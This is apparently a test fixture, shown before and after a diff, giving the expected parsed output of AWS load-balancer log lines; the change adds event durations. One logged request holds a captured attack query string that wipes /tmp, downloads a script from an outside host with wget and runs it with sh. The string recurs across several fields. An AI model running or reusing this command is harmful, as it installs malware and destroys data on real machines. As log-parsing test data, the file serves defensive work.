examples/aws_elb/test/test-alb.log-expected.json (before)
{
    "expected": [
        {
            "@timestamp": "2018-07-02T22:23:00.186Z",
            "aws": {
                "elb": {
                    "action_executed": [
                        "forward",
                        "redirect"
                    ],
                    "backend": {
                        "http": {
                            "response": {
                                "status_code": 200
                            }
                        },
                        "ip": "10.0.0.1",
                        "port": "80"
                    },
                    "backend_processing_time": {
                        "sec": 0.001
                    },
                    "matched_rule_priority": "0",
                    "name": "app/my-loadbalancer/50dc6c495c0c9188",
                    "protocol": "http",
                    "request_processing_time": {
                        "sec": 0.0
                    },
                    "response_processing_time": {
                        "sec": 0.0
                    },
                    "target_group": {
                        "arn": "arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"
                    },
                    "target_port": "10.0.0.1:80",
                    "target_status_code": "200",
                    "trace_id": "Root=1-58337262-36d228ad5d99923122bbe354",
                    "type": "http"
                }
            },
            "cloud": {
                "provider": "aws"
            },
            "ecs": {
                "version": "8.2.0"
            },
            "event": {
                "category": "web",
                "end": "2018-07-02T22:23:00.186Z",
                "kind": "event",
                "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"",
                "outcome": "success",
                "start": "2018-07-02T22:22:48.364000Z"
            },
            "http": {
                "request": {
                    "body": {
                        "bytes": 34
                    },
                    "method": "GET"
                },
                "response": {
                    "body": {
                        "bytes": 366
                    },
                    "status_code": 200
                },
                "version": "1.1"
            },
            "source": {
                "address": "192.168.131.39",
                "ip": "192.168.131.39",
                "port": 2817
            },
            "tags": [
                "preserve_original_event"
            ],
            "trace": {
                "id": "Root=1-58337262-36d228ad5d99923122bbe354"
            },
            "url": {
                "domain": "www.example.com",
                "original": "http://www.example.com:80/",
                "path": "/",
                "port": 80,
                "scheme": "http"
            },
            "user_agent": {
                "device": {
                    "name": "Other"
                },
                "name": "curl",
                "original": "curl/7.46.0",
                "version": "7.46.0"
            }
        },
        {
            "@timestamp": "2022-05-12T06:41:29.051Z",
            "aws": {
                "elb": {
                    "action_executed": [
                        "redirect"
                    ],
                    "classification": "Acceptable",
                    "classification_reason": "SpaceInUri",
                    "matched_rule_priority": "0",
                    "name": "app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e",
                    "protocol": "http",
                    "redirect_url": "https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                    "target_group": {
                        "arn": "-"
                    },
                    "trace_id": "Root=1-627cac19-4c6df30820daa80e3fd72ced",
                    "type": "http"
                }
            },
            "cloud": {
                "provider": "aws"
            },
            "ecs": {
                "version": "8.2.0"
            },
            "event": {
                "category": "web",
                "end": "2022-05-12T06:41:29.051Z",
                "kind": "event",
                "original": "http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 67.43.156.20:41542 - -1 -1 -1 301 - 233 390 \"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1\" \"Hello, world\" - - - \"Root=1-627cac19-4c6df30820daa80e3fd72ced\" \"-\" \"-\" 0 2022-05-12T06:41:29.051000Z \"redirect\" \"https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws\" \"-\" \"-\" \"-\" \"Acceptable\" \"SpaceInUri\"",
                "outcome": "success",
                "start": "2022-05-12T06:41:29.051000Z"
            },
            "http": {
                "request": {
                    "body": {
                        "bytes": 233
                    },
                    "method": "GET"
                },
                "response": {
                    "body": {
                        "bytes": 390
                    },
                    "status_code": 301
                },
                "version": "1.1"
            },
            "source": {
                "address": "67.43.156.20",
                "as": {
                    "number": 35908
                },
                "geo": {
                    "continent_name": "Asia",
                    "country_iso_code": "BT",
                    "country_name": "Bhutan",
                    "location": {
                        "lat": 27.5,
                        "lon": 90.5
                    }
                },
                "ip": "67.43.156.20",
                "port": 41542
            },
            "tags": [
                "preserve_original_event"
            ],
            "trace": {
                "id": "Root=1-627cac19-4c6df30820daa80e3fd72ced"
            },
            "url": {
                "domain": "127.0.0.1",
                "original": "http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                "path": "/shell",
                "port": 80,
                "query": "cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                "scheme": "http"
            },
            "user_agent": {
                "device": {
                    "name": "Other"
                },
                "name": "Other",
                "original": "Hello, world"
            }
        }
    ]
}

examples/aws_elb/test/test-alb.log-expected.json (after)
{
    "expected": [
        {
            "@timestamp": "2018-07-02T22:23:00.186Z",
            "aws": {
                "elb": {
                    "action_executed": [
                        "forward",
                        "redirect"
                    ],
                    "backend": {
                        "http": {
                            "response": {
                                "status_code": 200
                            }
                        },
                        "ip": "10.0.0.1",
                        "port": "80"
                    },
                    "backend_processing_time": {
                        "sec": 0.001
                    },
                    "matched_rule_priority": "0",
                    "name": "app/my-loadbalancer/50dc6c495c0c9188",
                    "protocol": "http",
                    "request_processing_time": {
                        "sec": 0.0
                    },
                    "response_processing_time": {
                        "sec": 0.0
                    },
                    "target_group": {
                        "arn": "arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"
                    },
                    "target_port": "10.0.0.1:80",
                    "target_status_code": "200",
                    "trace_id": "Root=1-58337262-36d228ad5d99923122bbe354",
                    "type": "http"
                }
            },
            "cloud": {
                "provider": "aws"
            },
            "ecs": {
                "version": "8.2.0"
            },
            "event": {
                "category": "web",
                "end": "2018-07-02T22:23:00.186Z",
                "kind": "event",
                "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"",
                "outcome": "success",
                "start": "2018-07-02T22:22:48.364000Z",
                "duration": 11822641000
            },
            "http": {
                "request": {
                    "body": {
                        "bytes": 34
                    },
                    "method": "GET"
                },
                "response": {
                    "body": {
                        "bytes": 366
                    },
                    "status_code": 200
                },
                "version": "1.1"
            },
            "source": {
                "address": "192.168.131.39",
                "ip": "192.168.131.39",
                "port": 2817
            },
            "tags": [
                "preserve_original_event"
            ],
            "trace": {
                "id": "Root=1-58337262-36d228ad5d99923122bbe354"
            },
            "url": {
                "domain": "www.example.com",
                "original": "http://www.example.com:80/",
                "path": "/",
                "port": 80,
                "scheme": "http"
            },
            "user_agent": {
                "device": {
                    "name": "Other"
                },
                "name": "curl",
                "original": "curl/7.46.0",
                "version": "7.46.0"
            }
        },
        {
            "@timestamp": "2022-05-12T06:41:29.051Z",
            "aws": {
                "elb": {
                    "action_executed": [
                        "redirect"
                    ],
                    "classification": "Acceptable",
                    "classification_reason": "SpaceInUri",
                    "matched_rule_priority": "0",
                    "name": "app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e",
                    "protocol": "http",
                    "redirect_url": "https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                    "target_group": {
                        "arn": "-"
                    },
                    "trace_id": "Root=1-627cac19-4c6df30820daa80e3fd72ced",
                    "type": "http"
                }
            },
            "cloud": {
                "provider": "aws"
            },
            "ecs": {
                "version": "8.2.0"
            },
            "event": {
                "category": "web",
                "end": "2022-05-12T06:41:29.051Z",
                "kind": "event",
                "original": "http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 67.43.156.20:41542 - -1 -1 -1 301 - 233 390 \"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1\" \"Hello, world\" - - - \"Root=1-627cac19-4c6df30820daa80e3fd72ced\" \"-\" \"-\" 0 2022-05-12T06:41:29.051000Z \"redirect\" \"https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws\" \"-\" \"-\" \"-\" \"Acceptable\" \"SpaceInUri\"",
                "outcome": "success",
                "start": "2022-05-12T06:41:29.051000Z",
                "duration": 646000
            },
            "http": {
                "request": {
                    "body": {
                        "bytes": 233
                    },
                    "method": "GET"
                },
                "response": {
                    "body": {
                        "bytes": 390
                    },
                    "status_code": 301
                },
                "version": "1.1"
            },
            "source": {
                "address": "67.43.156.20",
                "as": {
                    "number": 35908
                },
                "geo": {
                    "continent_name": "Asia",
                    "country_iso_code": "BT",
                    "country_name": "Bhutan",
                    "location": {
                        "lat": 27.5,
                        "lon": 90.5
                    }
                },
                "ip": "67.43.156.20",
                "port": 41542
            },
            "tags": [
                "preserve_original_event"
            ],
            "trace": {
                "id": "Root=1-627cac19-4c6df30820daa80e3fd72ced"
            },
            "url": {
                "domain": "127.0.0.1",
                "original": "http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                "path": "/shell",
                "port": 80,
                "query": "cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws",
                "scheme": "http"
            },
            "user_agent": {
                "device": {
                    "name": "Other"
                },
                "name": "Other",
                "original": "Hello, world"
            }
        }
    ]
}

examples/aws_elb/test/test-alb.log-expected.json (diff)
@@ -50,7 +50,8 @@
                 "kind": "event",
                 "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"",
                 "outcome": "success",
-                "start": "2018-07-02T22:22:48.364000Z"
+                "start": "2018-07-02T22:22:48.364000Z",
+                "duration": 11822641000
             },
             "http": {
                 "request": {
@@ -126,7 +127,8 @@
                 "kind": "event",
                 "original": "http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 67.43.156.20:41542 - -1 -1 -1 301 - 233 390 \"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1\" \"Hello, world\" - - - \"Root=1-627cac19-4c6df30820daa80e3fd72ced\" \"-\" \"-\" 0 2022-05-12T06:41:29.051000Z \"redirect\" \"https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws\" \"-\" \"-\" \"-\" \"Acceptable\" \"SpaceInUri\"",
                 "outcome": "success",
-                "start": "2022-05-12T06:41:29.051000Z"
+                "start": "2022-05-12T06:41:29.051000Z",
+                "duration": 646000
             },
             "http": {
                 "request": {
